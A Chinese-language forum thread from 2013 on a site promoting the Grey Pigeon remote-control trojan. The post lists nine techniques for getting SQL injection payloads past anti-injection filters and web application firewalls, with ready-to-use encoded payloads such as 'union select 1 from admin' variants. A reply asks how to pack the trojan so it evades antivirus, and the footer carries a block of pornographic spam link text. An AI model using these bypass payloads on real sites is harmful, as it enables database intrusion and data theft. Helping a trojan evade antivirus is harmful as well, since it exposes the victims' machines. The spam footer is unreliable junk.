灰鴿子遠(yuǎn)程控制軟件

 找回密碼
 立即注冊

QQ登錄

只需一步,快速開始

查看: 11116|回復(fù): 1
打印 上一主題 下一主題

繞過防注入系統(tǒng) 包括WAF的測試等多個(gè)方案 灰鴿子下載www.dumiaotech.com

[復(fù)制鏈接]
跳轉(zhuǎn)到指定樓層
樓主
發(fā)表于 2013-2-3 13:59:39 | 只看該作者 回帖獎(jiǎng)勵(lì) |倒序?yàn)g覽 |閱讀模式
繞過防注入系統(tǒng) 包括WAF的測試等多個(gè)方案 灰鴿子下載
方案一、  把測試代碼的空格替換成  /**/  或者+     (注:/**/ 和+ 不要進(jìn)行url編碼)
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02
03 如: id=1 or 1=1
    id=1/**/or/**/1=1
    id=1+or+1=1
方案二、把空格替換成非可見字符    %09 %0A %0D %0B
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02
03
04 如: id=1 or 1=1
    id=1%09or%091=1
    id=1%0Aor%0A1=1
    id=1%0A%0Bor%0A%0B1=1
方案三、把關(guān)鍵字用 /*!*/包起來,注,這個(gè)方法只適用于mysql數(shù)據(jù)庫的站點(diǎn)
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 and 1=1
    id=1 /*!and*/1=1
方案四、使用參數(shù)污染法攻擊繞過,注,該方法只適用于webserver是微軟的IIS的情況下
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
    id=1 union/*&id=*/select/*&id=*/from/*&id=*/admin
方案五、使用%繞過,注,該方法只適用于asp/aspx
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
    id=1 un%io%n sel%e%ct 1 fr%o%m ad%m%in
方案六、使用%23 (明文為#號)和%0A配合使用繞過,注,這個(gè)方法只適用于mysql數(shù)據(jù)庫的站點(diǎn)
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
    id=1%23afafasdf%0Aunion%23afafasdf%0Aselect%23afafasdf%0A1%23afafasdf%0Afrom%23afafasdf%0Aadmin
方案七、使用重復(fù)關(guān)鍵字繞過
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
    id=1 ununionion seleselectct 1 frofromm admin
方案八、使用unicode編碼繞過
?
如果要保持原樣復(fù)制代碼,需要雙擊后,選擇代碼右鍵復(fù)制即可
01
02 如: id=1 union select 1 from admin
    id=1 %u0075%u006e%u0069%u006f%u006e select 1 %u0066%u0072%u006f%u006d admin
方案九、使用畸形包繞過,只適用于 asp/aspx,詳情可以看80sec的站點(diǎn)
評帖賺銀幣(0) 收起
分享到:  QQ好友和群QQ好友和群
收藏收藏
回復(fù)

使用道具 舉報(bào)

沙發(fā)
發(fā)表于 2013-2-3 22:34:44 | 只看該作者
如果把輝鴿子包裝起來可以過防毒嗎?
評帖賺銀幣(0) 收起
您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規(guī)則

Archiver|手機(jī)版|小黑屋|灰鴿子遠(yuǎn)程控制軟件|灰鴿子遠(yuǎn)程控制軟件 ( 魯ICP備14000061號-4 )

GMT+8, 2025-3-14 01:58 , Processed in 0.185237 second(s), 24 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回復(fù) 返回頂部 返回列表
主站蜘蛛池模板: 日韩精品无码一本二本三本| 亚洲av无码国产精品色午夜字幕| 亚洲av无码国产综合专区| 无码人妻品一区二区三区精99| 精品欧洲av无码一区二区| 无码毛片一区二区三区中文字幕 | 亚洲中文字幕无码mv| 狼人无码精华AV午夜精品| 91精品日韩人妻无码久久不卡| 国产免费久久久久久无码| 人妻少妇看A偷人无码精品视频| 东京热加勒比无码视频| 无码专区国产精品视频| 无码爆乳护士让我爽| 国产拍拍拍无码视频免费| 亚洲AV无码一区二区三区在线观看| 无码国产精品一区二区免费vr| 中文字幕人妻三级中文无码视频| 中文字幕无码不卡一区二区三区| 亚洲AV无码久久精品狠狠爱浪潮| 无码人妻AⅤ一区二区三区水密桃| 亚洲精品久久无码av片俺去也| 少妇伦子伦精品无码STYLES | 狠狠躁狠狠爱免费视频无码| 免费看成人AA片无码视频羞羞网 | 无码区国产区在线播放| 最新无码A∨在线观看| 亚洲成av人片在线观看天堂无码| 无码中文字幕乱码一区| 激情射精爆插热吻无码视频 | 中文字幕av无码不卡免费| 国产免费午夜a无码v视频| 成年男人裸j照无遮挡无码| 久久亚洲精品无码gv| 粉嫩大学生无套内射无码卡视频 | 久久无码中文字幕东京热| 亚洲综合无码一区二区| 亚洲精品无码人妻无码| 久久精品无码中文字幕| 亚洲精品97久久中文字幕无码| 一区二区三区无码高清|